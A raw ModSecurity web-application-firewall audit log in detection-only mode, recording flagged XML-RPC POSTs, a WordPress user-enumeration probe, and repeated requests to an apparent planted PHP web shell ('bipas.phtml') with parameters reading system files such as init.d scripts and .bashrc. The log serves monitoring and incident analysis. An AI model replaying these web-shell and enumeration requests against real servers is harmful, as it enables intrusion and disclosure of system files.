Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (44+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (44+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFCyhRXnhE9cEv89BPm6hgAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750119045312788 1097847 (- - -) Stopwatch2: 1750119045312788 1097847; combined=3165, p1=498, p2=2163, p3=134, p4=44, p5=200, sr=128, sw=126, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e4011e19-Z-- --1d889549-A-- [17/Jun/2025:05:41:15.219837 +0530] aFCyo1CTF37l_jAzt4oYJAAAAAU 216.73.216.240 33638 127.0.0.1 7081 --1d889549-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d%2Fcron HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --1d889549-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4284 Connection: close Content-Type: text/html; charset=UTF-8 --1d889549-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/cron"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCyo1CTF37l_jAzt4oYJAAAAAU"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/cron"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCyo1CTF37l_jAzt4oYJAAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1750119075214337 5576 (- - -) Stopwatch2: 1750119075214337 5576; combined=3142, p1=434, p2=2495, p3=55, p4=42, p5=116, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1d889549-Z-- --e570b24c-A-- [17/Jun/2025:05:41:22.961207 +0530] aFCyqn4j6VFpohzeqUMRRgAAAAo 216.73.216.240 40490 127.0.0.1 7081 --e570b24c-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d%2Fssh HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --e570b24c-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4158 Connection: close Content-Type: text/html; charset=UTF-8 --e570b24c-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/ssh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCyqn4j6VFpohzeqUMRRgAAAAo"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/ssh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCyqn4j6VFpohzeqUMRRgAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750119082956226 5037 (- - -) Stopwatch2: 1750119082956226 5037; combined=2756, p1=381, p2=2191, p3=43, p4=40, p5=100, sr=88, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e570b24c-Z-- --760f8625-A-- [17/Jun/2025:05:41:46.548736 +0530] aFCywdyZ4SMykfn97vy85QAAAAs 146.190.105.35 60710 127.0.0.1 7081 --760f8625-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 489 Cookie: PHPSESSID=ljjbv2dnbrvei7bt37nfuqkh5r; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_b353662c2d98943e1ab19f652ea8ec%7C%7C1750291905%7C%7C1750288305%7C%7Cdd815648b27ab9076b3ab05ba06aac77; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=ac0bc4a8ee1486de8547d4600293aebf%7C%7C1750291905%7C%7C1750288305%7C%7C6d6600af590acd651515e03838f557d8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --760f8625-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=no4mnjtbms9qslvrlctdba0kvf; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_f2ea31eba6095771f0f8e92b7d647e%7C%7C1750291906%7C%7C1750288306%7C%7C87d631206ddcfd0caf70da32dabf5eb4; expires=Thu, 19 Jun 2025 00:11:46 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=470d6797fbb3a478268c398a06f161ca%7C%7C1750291906%7C%7C1750288306%7C%7C7e02cbc96d544adeebc1be20f9402d36; expires=Thu, 19 Jun 2025 00:11:46 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --760f8625-E-- --760f8625-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFCywdyZ4SMykfn97vy85QAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750119105502873 1045969 (- - -) Stopwatch2: 1750119105502873 1045969; combined=3343, p1=416, p2=2504, p3=122, p4=40, p5=164, sr=105, sw=97, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --760f8625-Z-- --36ab133f-A-- [17/Jun/2025:05:42:13.286169 +0530] aFCy3RXnhE9cEv89BPm6vgAAAAc 216.73.216.240 53998 127.0.0.1 7081 --36ab133f-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2Fcurrent%2Fetc%2Fskel&viewfile=%2F%2Fsnap%2Fcore20%2Fcurrent%2Fetc%2Fskel%2F.bashrc HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --36ab133f-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4752 Connection: close Content-Type: text/html; charset=UTF-8 --36ab133f-H-- Message: Warning. Matched phrase ".bashrc" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: .bashrc found within ARGS:viewfile: /snap/core20/current/etc/skel/.bashrc"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".bashrc" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: .bashrc found within ARGS:viewfile: /snap/core20/current/etc/skel/.bashrc"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCy3RXnhE9cEv89BPm6vgAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1750119133282946 3278 (- - -) Stopwatch2: 1750119133282946 3278; combined=1679, p1=224, p2=1350, p3=31, p4=23, p5=51, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --36ab133f-Z-- --4fcdb66c-A-- [17/Jun/2025:05:42:15.487396 +0530] aFCy334j6VFpohzeqUMRZQAAAAo 107.151.209.64 54204 127.0.0.1 7081 --4fcdb66c-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.bspsons.com X-Real-IP: 107.151.209.64 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 --4fcdb66c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.bspsons.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type X-WP-Total: 1 X-WP-TotalPages: 1 Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --4fcdb66c-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.bspsons.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.bspsons.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.bspsons.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aFCy334j6VFpohzeqUMRZQAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/bspsons.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750119135026463 461013 (- - -) Stopwatch2: 1750119135026463 461013; combined=1983, p1=318, p2=1572, p3=0, p4=0, p5=93, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4fcdb66c-Z-- --f158cc39-A-- [17/Jun/2025:05:42:29.438079 +0530] aFCy7X1eJdaXKB8u1kJMpgAAAAg 216.73.216.240 50810 127.0.0.1 7081 --f158cc39-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d%2Flvm2 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --f158cc39-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3396 Connection: close Content-Type: text/html; charset=UTF-8 --f158cc39-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/lvm2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCy7X1eJdaXKB8u1kJMpgAAAAg"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/lvm2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCy7X1eJdaXKB8u1kJMpgAAAAg"] Apache-Handler: application/x-httpd-php Stopwatch: 1750119149434230 3928 (- - -) Stopwatch2: 1750119149434230 3928; combined=2101, p1=347, p2=1564, p3=38, p4=28, p5=124, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f158cc39-Z-- --9551d048-A-- [17/Jun/2025:05:42:47.005171 +0530] aFCy_QJ4p5Cdblnjra59lwAAAAI 146.190.105.35 43048 127.0.0.1 7081 --9551d048-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 Cookie: PHPSESSID=kuuv35vcdcss1kef99qq95ucbh; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_f4c46b88450d3e281fef26f791e6ed%7C%7C1750291965%7C%7C1750288365%7C%7C42d4993baa20d22e6213414f703c3100; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=f063ad3a7d8fa952655dd97a1f3fc974%7C%7C1750291965%7C%7C1750288365%7C%7C4d7dc46fbcf5f21e0158f2caf86b9d41 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --9551d048-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=o61pgs9nbpjhh11suhip22cevo; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_ab2e0dc0df4f50664d6009c87d3236%7C%7C1750291966%7C%7C1750288366%7C%7C0b703e28a648b581177518c21353217c; expires=Thu, 19 Jun 2025 00:12:46 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=5b6e4057ec83c27c84b5d3ff60d5136b%7C%7C1750291966%7C%7C1750288366%7C%7C768f9b2e45164489da37e55be40d164c; expires=Thu, 19 Jun 2025 00:12:46 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --9551d048-E-- --9551d048-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFCy_QJ4p5Cdblnjra59lwAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750119165902286 1102971 (- - -) Stopwatch2: 1750119165902286 1102971; combined=3325, p1=409, p2=2407, p3=126, p4=45, p5=204, sr=98, sw=134, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9551d048-Z-- --98e6c542-A-- [17/Jun/2025:05:43:20.275158 +0530] aFCzIAJ4p5Cdblnjra59qAAAAAI 216.73.216.240 43852 127.0.0.1 7081 --98e6c542-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d%2Fhwclock.sh HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --98e6c542-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3738 Connection: close Content-Type: text/html; charset=UTF-8 --98e6c542-E-- --98e6c542-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/hwclock.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCzIAJ4p5Cdblnjra59qAAAAAI"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/hwclock.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCzIAJ4p5Cdblnjra59qAAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1750119200270217 5001 (- - -) Stopwatch2: 1750119200270217 5001; combined=2676, p1=365, p2=2117, p3=66, p4=38, p5=90, sr=93, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --98e6c542-Z-- --1c45de1a-A-- [17/Jun/2025:05:43:46.525038 +0530] aFCzOVCTF37l_jAzt4oYngAAAAU 146.190.105.35 37324 127.0.0.1 7081 --1c45de1a-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 489 Cookie: PHPSESSID=lcj701ugtp1qiqk1akarkdtl0u; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_11b64f70f5d4f8bda3dbe99caff8cc%7C%7C1750292025%7C%7C1750288425%7C%7C703b0f4c02144d480cc6657bd8773186; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=abfa0515b6355b14d6b1dd223863d3eb%7C%7C1750292025%7C%7C1750288425%7C%7C13d79ecbad2d72b8a2e59aa61c16a5f2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --1c45de1a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=mdlb2q94jn6vfmr5j75ihluoav; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_988bb5a94185ba23cbe6ab5574ff7f%7C%7C1750292026%7C%7C1750288426%7C%7Cb1e5c302adbcd5663fdd007b7df5db74; expires=Thu, 19 Jun 2025 00:13:46 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=0698cb7f8d006c3e143f35ad32d4d57d%7C%7C1750292026%7C%7C1750288426%7C%7C806f1645dd7441e0e4fc0eef953526ce; expires=Thu, 19 Jun 2025 00:13:46 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --1c45de1a-E-- --1c45de1a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (44+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (44+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname 